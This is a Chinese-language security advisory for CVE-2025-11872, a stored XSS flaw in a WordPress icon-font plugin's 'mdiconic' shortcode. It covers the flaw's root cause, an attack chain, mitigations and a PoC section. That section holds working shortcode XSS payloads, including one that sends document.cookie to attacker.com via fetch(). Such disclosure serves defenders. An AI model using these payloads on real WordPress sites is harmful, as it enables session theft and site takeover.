CVE-2025-11872：WordPress Material Design Iconic Font插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11872

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Material Design Iconic Font Integration插件

漏洞概述

CVE-2025-11872是WordPress平台上Material Design Iconic Font Integration插件中存在的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞由WordFence安全团队的研究员发现，并于2025年10月22日正式披露。该插件是一款用于在WordPress网站中集成Material Design图标字体的工具，允许用户通过简码（shortcode）方式在文章和页面中插入图标。

根据CVSS 3.1评分体系，该漏洞获得了6.4分的中危评分。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L），无需用户交互（UI:N）。该漏洞的影响范围已发生变化（S:C），表明其可能影响超出组件本身的资源。机密性影响为低（C:L），完整性影响为低（I:L），可用性影响为无（A:N）。

该漏洞的核心问题在于插件的'mdiconic'短码（shortcode）在处理用户输入的属性时，未能进行充分的输入清理（input sanitization）和输出转义（output escaping）。这使得具有贡献者级别（contributor-level）权限及以上的认证攻击者能够通过精心构造的短码属性，将任意JavaScript代码注入到WordPress页面中。由于这些恶意脚本会被存储在服务器端，每当普通用户访问被注入的页面时，恶意代码就会在受害者浏览器中自动执行。

技术细节

该漏洞的技术原理在于WordPress短码（shortcode）机制中的安全缺陷。Material Design Iconic Font Integration插件注册了一个名为'mdiconic'的短码，用于在文章内容中渲染图标。当用户在文章编辑器中插入类似[mdiconic icon="home" color="red"]这样的短码时，插件会解析这些属性并生成相应的HTML输出。

漏洞的根本原因在于插件的短码回调函数（位于md-iconic-font-integration.php第46行附近）在处理用户提供的属性值时，没有调用WordPress提供的安全函数（如wp_kses、esc_attr、esc_html等）进行适当的清理和转义。具体而言，攻击者可以构造包含恶意JavaScript代码的属性值，例如使用onerror、onclick等事件处理器或<script>标签。

利用方式如下：攻击者首先需要拥有一个有效的WordPress账户，且该账户至少具有贡献者级别的权限。然后，攻击者创建一篇新文章或页面，在内容中插入恶意构造的短码，例如[mdiconic icon="x" color="red" onclick="alert(document.cookie)"]或类似的payload。由于插件未对属性值进行转义，恶意代码会原样存储到数据库中。当其他用户（包括管理员）访问该页面时，浏览器会解析并执行注入的JavaScript代码。

由于该漏洞需要认证才能利用（PR:L），且影响范围已发生变化（S:C），这意味着存储的恶意脚本可能在多个用户访问时执行，扩大了攻击的影响面。攻击者可以利用此漏洞窃取用户会话cookie、进行权限提升、植入后门、重定向用户到恶意网站，或执行其他恶意操作。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者获取一个具有贡献者（Contributor）级别或以上权限的WordPress账户凭据。这可以通过注册新账户（如果网站开放注册）或通过钓鱼、社会工程等方式获取现有账户。

STEP 2

步骤2：登录WordPress后台

攻击者使用获取的凭据登录WordPress管理后台，确认其具有创建/编辑文章或页面的权限。

STEP 3

步骤3：构造恶意短码

攻击者创建一篇新的文章或页面，在内容编辑器中插入精心构造的'mdiconic'短码payload，其中包含恶意JavaScript代码（如事件处理器或脚本标签）。

STEP 4

步骤4：发布恶意内容

由于插件未对短码属性进行输入清理和输出转义，恶意payload被原样存储到WordPress数据库中。攻击者将文章状态设置为已发布（Published）。

STEP 5

步骤5：触发XSS执行

当任何用户（包括管理员、编辑或其他访问者）访问包含恶意短码的页面时，浏览器解析HTML并执行注入的JavaScript代码。攻击者可以借此窃取cookie、会话令牌，或执行其他恶意操作。

STEP 6

步骤6：权限提升与持久化

如果管理员访问了被注入的页面，攻击者可以利用窃取的会话信息进行权限提升，进一步控制WordPress网站，或植入Web Shell实现持久化访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- 
PoC for CVE-2025-11872
Stored XSS via 'mdiconic' shortcode in Material Design Iconic Font Integration plugin
Requires: Contributor-level WordPress account or above
-->

<!-- Step 1: Login to WordPress as a Contributor or higher -->
<!-- Step 2: Create a new Post or Page -->
<!-- Step 3: Insert the following malicious shortcode in the content editor -->

[mdiconic icon="fa-home" color="' onmouseover='alert(document.cookie)"]

<!-- Alternative payloads -->

<!-- Payload 1: Using onerror event handler -->
[mdiconic icon='" onerror="alert(1)'"]

<!-- Payload 2: Using onclick event handler -->
[mdiconic icon="test" size='" onclick="alert("XSS")"']

<!-- Payload 3: Breaking out of attribute context -->
[mdiconic icon="><script>alert('XSS-CVE-2025-11872')</script>"]

<!-- Step 4: Publish the post/page -->
<!-- Step 5: When any user visits the published page, the malicious JavaScript executes in their browser -->

<!-- Full exploit example using HTML/JS for understanding -->
<script>
// Simulated exploit flow:
// 1. Attacker authenticates with contributor credentials
// 2. Attacker submits post with payload via WordPress REST API or admin panel
// 3. Payload gets stored in wp_posts table without sanitization
// 4. When victim loads the page, shortcode renders unsanitized HTML
// 5. Malicious script executes in victim's browser context

var exploitPayload = '[mdiconic icon="fa-home" color="\' onmouseover=\'fetch(\"https://attacker.com/steal?cookie=\"+document.cookie)\'"]';
console.log("XSS Payload:", exploitPayload);
</script>

影响范围

Material Design Iconic Font Integration插件所有版本 <= 2

防御指南

临时缓解措施

在官方发布修复版本之前，建议采取以下临时缓解措施：1）暂时禁用Material Design Iconic Font Integration插件；2）限制只有可信的管理员才能创建和发布内容，临时降低贡献者权限或暂停贡献者账户；3）在Web服务器层面部署WAF规则，过滤包含恶意短码属性的请求；4）通过.htaccess或Nginx配置添加Content-Security-Policy头，限制内联脚本执行；5）定期扫描已发布的内容，查找并清理已注入的恶意短码。